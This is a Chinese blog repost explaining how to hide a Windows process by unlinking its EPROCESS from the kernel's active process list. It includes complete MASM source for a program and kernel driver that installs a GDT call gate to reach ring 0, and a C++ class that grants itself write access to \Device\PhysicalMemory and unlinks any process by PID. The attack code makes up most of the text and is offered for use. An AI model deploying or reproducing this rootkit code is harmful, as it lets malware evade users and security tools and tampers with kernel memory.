修改活动进程链来隐藏进程代码

最新推荐文章于 2021-10-24 20:33:21 发布

iiprogram

最新推荐文章于 2021-10-24 20:33:21 发布

阅读量3.2k

点赞数

分类专栏： windows底层核心編程文章标签：活动 null attributes include object access

windows底层核心編程专栏收录该内容

743 篇文章 18 订阅

订阅专栏

汇编：

by zjjm

很多贴子都写过如何修改活动进程链来隐藏进程，但大多不说明原因，让别人知其然不知其所以然，今天俺来发个贴子献献丑。
大家可能使用过PsGetCurrentProcess函数来获取当前线程的EPROCESS，如果你反汇编这个函数的话，你一定会发现这可能是内核中最简单的一个函数了，只有三行：

mov eax, fs:0x00000124;

mov eax, [eax + 0x44];

ret

这么简单的代码也行？当然可以！Windows中有一个叫Kernel's Processor Control Block (KPRCB)，核心处理控制块)模块的好东东，它总是位于0xffdff120地址，它的数据结构也不复杂，双字指向一个地址，这个地址叫做ETHREAD块，0xffdff124指向当前线程的ETHREAD块，再下一个就是下个线程的ETHREAD块，简单吧，ETHREAD块的数据结构相对复杂，不过你只需要知道它的offset 0x44处为EPROCESS块的地址就可以了，这就是三行代码就可以得到当前线程的EPROCESS地址的原因！EPROCESS块中有个有趣的数据结构叫活动进程链，它只有两个双字，一个FlINK，一个BLINK，FLINK指向下一个EPROCESS块的FLINK地址，BLINK则指向上一个EPROCESS块的BLINK地址，要想隐藏进程的话，只需要把自己脱链就可以了，呵呵！

mov eax,dword ptr ds:[0ffdff124h] ;ETHREAD地址
mov eax,[eax+44h] ;EPROCESS地址
mov ecx,088h ;XP中活动进程链地址,NT下为0x98,2000下为0xA0,自己看着办吧！
mov esi,dword ptr[eax+ecx] ;XP中FLINK
mov edi,dword ptr[eax+ecx+4] ;BLINK

mov dword ptr[esi+4],edi ;BLINK放到后一个BLINK
mov dword ptr[edi],esi ;FLINK放到前一个FLINK

以下是一个例子！

.386p
.model flat, stdcall
option casemap:none
include /masm32/include/windows.inc
include /masm32/include/kernel32.inc
include /masm32/include/user32.inc
include macros.asm
include masm32.inc
include debug.inc
include advapi32.inc
includelib debug.lib
includelib masm32.lib
includelib /masm32/lib/user32.lib
includelib /masm32/lib/kernel32.lib
includelib advapi32.lib

.data

dwFileSize dd 0
hFile dd 0
hMemory dd 0
pMemory dd 0
FunBase dd 0b6a8h

tmp db 50 dup(90)
Callgt dd 0
dw 353h

.data?

hInstance HINSTANCE ?
CommandLine LPSTR ?

.code
WinMain proc hInst:HINSTANCE,hPrevInst:HINSTANCE,CmdLine:LPSTR,CmdShow:DWORD
LOCAL wc:WNDCLASSEX
LOCAL msg:MSG
LOCAL hwnd:HWND
mov wc.cbSize,SIZEOF WNDCLASSEX
mov wc.style, CS_HREDRAW or CS_VREDRAW
mov wc.lpfnWndProc, OFFSET WndProc
mov wc.cbClsExtra,NULL
mov wc.cbWndExtra,NULL
push hInst
pop wc.hInstance
mov wc.hbrBackground,COLOR_WINDOW+1
mov wc.lpszMenuName,NULL
mov wc.lpszClassName,CTXT("HIDE")
invoke LoadIcon,NULL,IDI_APPLICATION
mov wc.hIcon,eax
mov wc.hIconSm,0
invoke LoadCursor,NULL,IDC_ARROW
mov wc.hCursor,eax
invoke RegisterClassEx, addr wc
INVOKE CreateWindowEx,NULL,CTXT("HIDE"),CTXT("HIDE"),/
WS_OVERLAPPEDWINDOW,CW_USEDEFAULT,/
CW_USEDEFAULT,CW_USEDEFAULT,CW_USEDEFAULT,NULL,NULL,/
hInst,NULL
mov hwnd,eax
INVOKE ShowWindow, hwnd,SW_SHOWNORMAL
INVOKE UpdateWindow, hwnd
.WHILE TRUE
INVOKE GetMessage, ADDR msg,NULL,0,0
.BREAK .IF (!eax)
INVOKE TranslateMessage, ADDR msg
INVOKE DispatchMessage, ADDR msg
.ENDW
mov eax,msg.wParam
ret
WinMain endp
WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
LOCAL hdc:HDC
LOCAL ps:PAINTSTRUCT
LOCAL rect:RECT
.IF uMsg==WM_CLOSE
invoke DestroyWindow,hWnd
invoke PostQuitMessage,NULL
.ELSEIF uMsg==WM_PAINT
invoke BeginPaint,hWnd, ADDR ps
mov hdc,eax
invoke GetClientRect,hWnd, ADDR rect
invoke DrawText, hdc,CTXT("不用ICESWORD，你能看见俺吗？"),-1, ADDR rect, DT_SINGLELINE or DT_CENTER or DT_VCENTER
invoke EndPaint,hWnd, ADDR ps
.ELSE
invoke DefWindowProc,hWnd,uMsg,wParam,lParam
ret
.ENDIF
xor eax,eax
ret
WndProc endp
_OpenSys proc

local hSCManager:HANDLE
local hService:HANDLE
local acDriverPath[MAX_PATH]:CHAR

; Open a handle to the SC Manager database
invoke OpenSCManager, NULL, NULL, SC_MANAGER_CREATE_SERVICE
.if eax != NULL
mov hSCManager, eax

push eax
invoke GetFullPathName, CTXT("sys.sys",0), sizeof acDriverPath, addr acDriverPath, esp
pop eax

; Register driver in SCM active database
invoke CreateService, hSCManager, CTXT("sys",0), CTXT("System",0), /
SERVICE_START + DELETE, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, /
SERVICE_ERROR_IGNORE, addr acDriverPath, NULL, NULL, NULL, NULL, NULL
.if eax != NULL
mov hService, eax
invoke StartService, hService, 0, NULL
; Here driver beeper.sys plays its nice melody
; and reports error to be removed from memory
; Remove driver from SCM database
invoke DeleteService, hService
invoke CloseServiceHandle, hService
.else
invoke MessageBox, NULL, CTXT("Can't register driver.",0), NULL, MB_ICONSTOP
.endif
invoke CloseServiceHandle, hSCManager
.else
invoke MessageBox, NULL, CTXT("Can't connect to Service Control Manager.",0), /
NULL, MB_ICONSTOP
.endif
ret

_OpenSys endp
start:

invoke _OpenSys

call fword ptr [Callgt] ;use callgate to Ring0!

mov eax,esp ;save ring0 esp
mov esp,[esp+4];->ring3 esp
push eax

pushfd
pushad

mov eax,dword ptr ds:[0ffdff124h] ;ETHREAD地址
mov eax,[eax+44h] ;EPROCESS地址
mov ecx,088h
mov esi,dword ptr[eax+ecx] ;XP中FLINK
mov edi,dword ptr[eax+ecx+4] ;BLINK

mov dword ptr[esi+4],edi ;BLINK放到后一个BLINK
mov dword ptr[edi],esi ;FLINK放到前一个FLINK

popad
popfd

pop esp ;restore ring0 esp
push offset Exit
retf

Exit:
invoke _OpenSys
invoke Sleep,2 ;

invoke GetModuleHandle, NULL
mov hInstance,eax
invoke GetCommandLine
invoke WinMain, hInstance,NULL,CommandLine, SW_SHOWDEFAULT
invoke ExitProcess,NULL
end start

附件： HIDE.zip (3 K)

sys.sys只是负责生成一个调用门，代码如下：

;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;
; CallGate - Kernel Mode Driver
;
; Written by zjjmj2002 (zjjmj2002@tom.com)
;
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

.386
.model flat, stdcall
option casemap:none

;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; I N C L U D E F I L E S
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

include /masm32/include/w2k/ntstatus.inc
include /masm32/include/w2k/ntddk.inc

;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; C O D E
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

.code

;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DriverEntry
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

DriverEntry proc pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING

pushfd
pushad

push edx
sgdt [esp-2]
pop edx
mov eax,edx
mov ecx,350h

.if dword ptr [edx+ecx+2]!=0ec000358h
mov byte ptr [edx],0c3h
mov word ptr [edx+ecx],ax
shr eax,16
mov word ptr [edx+ecx+6],ax
mov dword ptr [edx+ecx+2],0ec000358h
mov dword ptr [edx+ecx+8],0000ffffh
mov dword ptr [edx+ecx+12],00cf9a00h
.endif

popad
popfd

mov eax, STATUS_DEVICE_CONFIGURATION_ERROR
ret

DriverEntry endp

;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

end DriverEntry

＝＝＝＝＝＝c代码 by ks12345

// HideProcess.cpp: implementation of the CHideProcess class.
//进程隐藏程序
// 要隐藏时调用HideProcess即可
//

#include <windows.h>
#include <Accctrl.h>
#include <Aclapi.h>

#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)

typedef LONG NTSTATUS;

typedef struct _IO_STATUS_BLOCK
{
NTSTATUS Status;
ULONG Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;

typedef struct _UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

#define OBJ_INHERIT 0x00000002L
#define OBJ_PERMANENT 0x00000010L
#define OBJ_EXCLUSIVE 0x00000020L
#define OBJ_CASE_INSENSITIVE 0x00000040L
#define OBJ_OPENIF 0x00000080L
#define OBJ_OPENLINK 0x00000100L
#define OBJ_KERNEL_HANDLE 0x00000200L
#define OBJ_VALID_ATTRIBUTES 0x000003F2L

typedef struct _OBJECT_ATTRIBUTES
{
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

//
// SYSTEM_INFORMATION_CLASS
//
typedef enum _SYSTEM_INFORMATION_CLASS
{
SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;

//
// SYSTEM_HANDLE_INFORMATION
// Information Class 16
//
typedef struct _SYSTEM_HANDLE_INFORMATION
{
ULONG ProcessId;
UCHAR ObjectTypeNumber;
UCHAR Flags;
USHORT Handle;
PVOID Object;
ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;

typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
OUT PHANDLE SectionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes
);

typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
IN OUT PUNICODE_STRING DestinationString,
IN PCWSTR SourceString
);

typedef NTSTATUS ( __stdcall *ZWQUERYSYSTEMINFORMATION ) (
IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
IN OUT PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength OPTIONAL
);

RTLINITUNICODESTRING RtlInitUnicodeString = NULL;
ZWOPENSECTION ZwOpenSection = NULL;
ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation = NULL;
HMODULE g_hNtDLL = NULL;
PVOID g_pMapPhysicalMemory = NULL;
HANDLE g_hMPM = NULL;
OSVERSIONINFO g_osvi;
//---------------------------------------------------------------------------

BOOL CHideProcess::m_bInit = FALSE;
CHideProcess CHideProcess::m_NoAction;
//
// Construction/Destruction
//

CHideProcess::CHideProcess()
{
m_bInit = InitNTDLL();
}

CHideProcess::~CHideProcess()
{
CloseNTDLL();
}

// load dll and get functions
BOOL CHideProcess::InitNTDLL()
{
// load dll
if (NULL == g_hNtDLL)
{
g_hNtDLL = LoadLibrary(_T("ntdll.dll"));
if (NULL == g_hNtDLL)
{
return FALSE;
}
}

// get functions
RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL, "RtlInitUnicodeString");
ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");
ZwQuerySystemInformation = ( ZWQUERYSYSTEMINFORMATION )GetProcAddress( g_hNtDLL, "ZwQuerySystemInformation" );
if ((RtlInitUnicodeString == NULL)
|| (ZwOpenSection == NULL)
|| (ZwQuerySystemInformation == NULL))
{
return FALSE;
}

m_bInit = TRUE;
return TRUE;
}
//---------------------------------------------------------------------------
VOID CHideProcess::CloseNTDLL()
{
if (NULL != g_hNtDLL)
{
FreeLibrary(g_hNtDLL);
g_hNtDLL = NULL;
m_bInit = FALSE;
}
}
//---------------------------------------------------------------------------
VOID CHideProcess::SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
{
PACL pDacl = NULL;
PSECURITY_DESCRIPTOR pSD = NULL;
PACL pNewDacl = NULL;

DWORD dwRes = GetSecurityInfo(
hSection,
SE_KERNEL_OBJECT,
DACL_SECURITY_INFORMATION,
NULL,
NULL,
&pDacl,
NULL,
&pSD
);

if(ERROR_SUCCESS != dwRes)
{

if(pSD)
LocalFree(pSD);
if(pNewDacl)
LocalFree(pNewDacl);
}

EXPLICIT_ACCESS ea;
RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
ea.grfAccessPermissions = SECTION_MAP_WRITE;
ea.grfAccessMode = GRANT_ACCESS;
ea.grfInheritance= NO_INHERITANCE;
ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
ea.Trustee.ptstrName = "CURRENT_USER";

dwRes = SetEntriesInAcl(1,&ea,pDacl,&pNewDacl);

if(ERROR_SUCCESS != dwRes)
{

if(pSD)
LocalFree(pSD);
if(pNewDacl)
LocalFree(pNewDacl);
}
dwRes = SetSecurityInfo(
hSection,
SE_KERNEL_OBJECT,
DACL_SECURITY_INFORMATION,
NULL,
NULL,
pNewDacl,
NULL
);

if(ERROR_SUCCESS != dwRes)
{
if(pSD)
LocalFree(pSD);
if(pNewDacl)
LocalFree(pNewDacl);
}

}
//---------------------------------------------------------------------------
HANDLE CHideProcess::OpenPhysicalMemory()
{
NTSTATUS status;
UNICODE_STRING physmemString;
OBJECT_ATTRIBUTES attributes;
ULONG PhyDirectory;

g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx (&g_osvi);

if (5 != g_osvi.dwMajorVersion)
return NULL;

switch(g_osvi.dwMinorVersion)
{
case 0:
PhyDirectory = 0x30000;
break; // 2k
case 1:
PhyDirectory = 0x39000;
break; // xp
case 2:
PhyDirectory = 0x39000;
break; // 2k03
default:
AfxMessageBox(_T("init PhysicalMemory: Unknown version..."));
TFileTrace(_T("init PhysicalMemory: Unknown version.../n"));
return NULL;
}

RtlInitUnicodeString(&physmemString, L"//Device//PhysicalMemory");

attributes.Length = sizeof(OBJECT_ATTRIBUTES);
attributes.RootDirectory = NULL;
attributes.ObjectName = &physmemString;
attributes.Attributes = 0;
attributes.SecurityDescriptor = NULL;
attributes.SecurityQualityOfService = NULL;

status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);

if(status == STATUS_ACCESS_DENIED)
{
status = ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM);
status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);
}

if(!NT_SUCCESS(status))
{
AfxMessageBox(_T("Open section: //Device//PhysicalMemory failed..."));
TFileTrace(_T("Open section: //Device//PhysicalMemory failed.../n"));
return NULL;
}

TFileTrace(_T("OpenPhysicalMemory() OffSet: %p/n"), PhyDirectory);
g_pMapPhysicalMemory = MapViewOfFile( // ZwMapViewOfSection
g_hMPM, // handle
FILE_MAP_READ|FILE_MAP_WRITE,
0, // offset high part
PhyDirectory, // offset low part
0x1000 // size
);

if( g_pMapPhysicalMemory == NULL )
{
AfxMessageBox(_T("//Device//PhysicalMemory MapViewOfFile failed..."));
TFileTrace(_T("//Device//PhysicalMemory MapViewOfFile failed..."));
return NULL;
}

return g_hMPM;
}
//---------------------------------------------------------------------------
PVOID CHideProcess::LinearToPhys(PULONG BaseAddress, PVOID addr)
{
ULONG VAddr = (ULONG)addr;
ULONG PGDE = BaseAddress[VAddr>>22];
ULONG PTE;
ULONG PAddr;

if (0 == (PGDE & 1))
return 0;

ULONG tmp = PGDE & 0x00000080;

if (0 != tmp)
{
PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF);
}
else
{
TFileTrace(_T("GetData() OffSet: %p/n"), PGDE & 0xfffff000);
PGDE = (ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000);
PTE = ((PULONG)PGDE)[(VAddr&0x003FF000)>>12];

if (0 == (PTE&1))
return 0;

PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);
UnmapViewOfFile((PVOID)PGDE);
}

return (PVOID)PAddr;
}
//---------------------------------------------------------------------------
ULONG CHideProcess::GetData(PVOID addr)
{
ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
TFileTrace(_T("GetData() g_pMapPhysicalMemory: %p, addr: %p, phys: %p/n"),
g_pMapPhysicalMemory, addr, phys);
TFileTrace(_T("GetData() OffSet: %p/n"), phys & 0xfffff000);
PULONG tmp = (PULONG)MapViewOfFile(
g_hMPM,
FILE_MAP_READ|FILE_MAP_WRITE,
0,
phys & 0xfffff000, // offset low part
0x1000 // size
);

if (0 == tmp)
return 0;

ULONG ret = tmp[(phys & 0xFFF)>>2];
UnmapViewOfFile(tmp);

return ret;
}
//---------------------------------------------------------------------------
BOOL CHideProcess::SetData(PVOID addr,ULONG data)
{
ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
TFileTrace(_T("SetData() OffSet: %p/n"), phys & 0xfffff000);
PULONG tmp = (PULONG)MapViewOfFile(
g_hMPM,
FILE_MAP_WRITE,
0,
phys & 0xfffff000,
0x1000
);

if (0 == tmp)
return FALSE;

tmp[(phys & 0xFFF)>>2] = data;
UnmapViewOfFile(tmp);

return TRUE;
}
//---------------------------------------------------------------------------
/*
long __stdcall CHideProcess::exeception(struct _EXCEPTION_POINTERS *tmp)
{
ExitProcess(0);
return 1 ;
}
//*/
//---------------------------------------------------------------------------
DWORD CHideProcess::GetEprocessFromPid (ULONG PID)
{
NTSTATUS status;
PVOID buf = NULL;
ULONG size = 1;
ULONG NumOfHandle = 0;
ULONG i;
PSYSTEM_HANDLE_INFORMATION h_info = NULL;
DWORD dwCurrentID = GetCurrentProcessId();
// TRACE(_T("GetCurrentProcessId = %d/n"), dwCurrentID);

// LocateNtdllEntry( );
//打开自身句柄,这样才能在 handle 列表中找到自己, PROCESS 对应 ObjectTypeNum 为5
HANDLE hProc = OpenProcess(
// PROCESS_ALL_ACCESS,
PROCESS_QUERY_INFORMATION,
FALSE,
PID // GetCurrentProcessId() //
);
if (NULL == hProc)
{
TRACE(_T("OpenProcess failed! GetLastError() = %d/n"), GetLastError());
TFileTrace(_T("OpenProcess failed! GetLastError() = %d/n"), GetLastError());
return 0;
}

for ( size = 1024; ; size *= 2 )
{
if ( NULL == ( buf = calloc( size, 1 ) ) )
{
TRACE( _T("calloc( %u, 1 ) failed/n"), size );
TFileTrace(_T("calloc( %u, 1 ) failed/n"), size );
if ( buf != NULL )
{
free( buf );
buf = NULL;
}
CloseHandle(hProc);
return 0;
}
status = ZwQuerySystemInformation( SystemHandleInformation, buf, size, NULL );
if ( !NT_SUCCESS( status ) )
{
if ( STATUS_INFO_LENGTH_MISMATCH == status )
{
free( buf );
buf = NULL;
continue;
}
else
{
TFileTrace( "ZwQuerySystemInformation() failed/n");
TRACE( "ZwQuerySystemInformation() failed/n");
if ( buf != NULL )
{
free( buf );
buf = NULL;
}
CloseHandle(hProc);
return 0;
}
}
else
{
break;
}
} /* end of for */

//返回到缓冲区的首先是一个ULONG类型的数据,表示有多少数组
NumOfHandle = *((PULONG)buf);

h_info = ( PSYSTEM_HANDLE_INFORMATION )((ULONG)buf + 4);

for(i = 0; i < NumOfHandle; i++)
{
if(h_info.ProcessId == dwCurrentID)//&&( h_info.Handle==0x3d8 ) )
{
// TRACE(_T("ProcessId: %d, Handle: %p, OBJECT: %p, ObjectTypeNumber: %d/n/r"),
// PID, h_info.Handle, h_info.Object, h_info.ObjectTypeNumber);
if (h_info.Handle == (DWORD)hProc) // (h_info.ObjectTypeNumber == 5)
{
// TRACE(_T("****ProcessId: %d, Handle:%p, OBJECT %p/n/r"),
// PID, hProc, h_info.Object);
DWORD dwRet = (DWORD)(h_info.Object);
if (buf != NULL)
{
free( buf );
buf = NULL;
}
CloseHandle(hProc);
return dwRet;
}
}
}

if ( buf != NULL )
{
free( buf );
buf = NULL;
}
CloseHandle(hProc);
return 0;
}

// 隐藏进程主函数
BOOL CHideProcess::YHideProcess(DWORD dwID)
{
//
if (!m_bInit)
{
AfxMessageBox(_T("load NTDLL failed..."));
TFileTrace(_T("load NTDLL failed.../n"));
return FALSE;
}

// 获得指向进程的 EPROCESS 数据块的指针
ULONG process = (ULONG)GetEprocessFromPid(dwID);
if (process == 0)
{
//
TFileTrace(_T("GetEprocessFromPid() failed.../n"));
return FALSE;
}
TFileTrace(_T("GetEprocessFromPid() process = %p.../n"), process);

// 这个是打开对应的系统内存，并且映射为一个核心对象
if (NULL == OpenPhysicalMemory())
{
AfxMessageBox(_T("OpenPhysicalMemory() failed..."));
TFileTrace(_T("OpenPhysicalMemory() failed.../n"));
return FALSE;
}
//
// 下面的两个 if 完成对 Windows 的系统版本判断（只判断了2K和XP），
// 并且根据不同的系统确定 EPROCESS 块中两个指针 FLINK 和 BLINK 的偏移位置
ULONG fw, bw;
if (0 == g_osvi.dwMinorVersion)
{
// in Win2000/Vista:
fw = GetData(PVOID(process + 0xa0));
bw = GetData(PVOID(process + 0xa4));
}
else if ((1 == g_osvi.dwMinorVersion)
|| (2 == g_osvi.dwMinorVersion))
{
// in WinXP: in Win2003
fw = GetData(PVOID(process + 0x88));
bw = GetData(PVOID(process + 0x8c));
}

// ****
TRACE(_T("process = %p/tfw = %p/tbw = %p ****Correct/n"), process, fw, bw);
TFileTrace(_T("process = %p/tfw = %p/tbw = %p ****Correct/n"), process, fw, bw);

// 下面的两个SetData完成对进程活动链的更改，
// 也就是让进程活动链跳过当前进程的EPROCESS块
SetData(PVOID(fw + 4), bw);
SetData(PVOID(bw), fw);

// 完成了
UnmapViewOfFile(g_pMapPhysicalMemory);
g_pMapPhysicalMemory = NULL;
CloseHandle(g_hMPM);
g_hMPM = NULL;

return TRUE;
}

// 隐藏进程接口
BOOL CHideProcess::HideCurrent()
{
TFileTrace(_T("Hide Current Process ID = %d /n"), GetCurrentProcessId());
return YHideProcess(GetCurrentProcessId());
}

// 隐藏进程接口
BOOL CHideProcess::HideByID(DWORD dwID)
{
TFileTrace(_T("Hide Process ID = %d /n"), dwID);
return YHideProcess(dwID);
}

class CHideProcess
{
public:
// 接口：隐藏当前进程
static BOOL HideCurrent();

// 接口：隐藏当前进程
static BOOL HideByID(DWORD dwID);

// 析构
virtual ~CHideProcess();
protected:
static BOOL InitNTDLL();
static BOOL YHideProcess(DWORD dwID);
static VOID CloseNTDLL();
static VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection);
static HANDLE OpenPhysicalMemory();
static PVOID LinearToPhys(PULONG BaseAddress, PVOID addr);
static ULONG GetData(PVOID addr);
static BOOL SetData(PVOID addr,ULONG data);
static DWORD GetEprocessFromPid (ULONG PID);
// long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp);

protected:
static BOOL m_bInit;
static CHideProcess m_NoAction;

private:
// 构造析构
CHideProcess();
};

iiprogram

关注

0
点赞
踩
4

收藏

觉得还不错? 一键收藏
0
评论
修改活动进程链来隐藏进程代码

汇编：by zjjm很多贴子都写过如何修改活动进程链来隐藏进程，但大多不说明原因，让别人知其然不知其所以然，今天俺来发个贴子献献丑。大家可能使用过PsGetCurrentProcess函数来获取当前线程的EPROCESS，如果你反汇编这个函数的话，你一定会发现这可能是内核中最简单的一个函数了，只有三行：mov eax, fs:0x00000124;mov eax, [eax + 0x44]
复制链接

扫一扫

专栏目录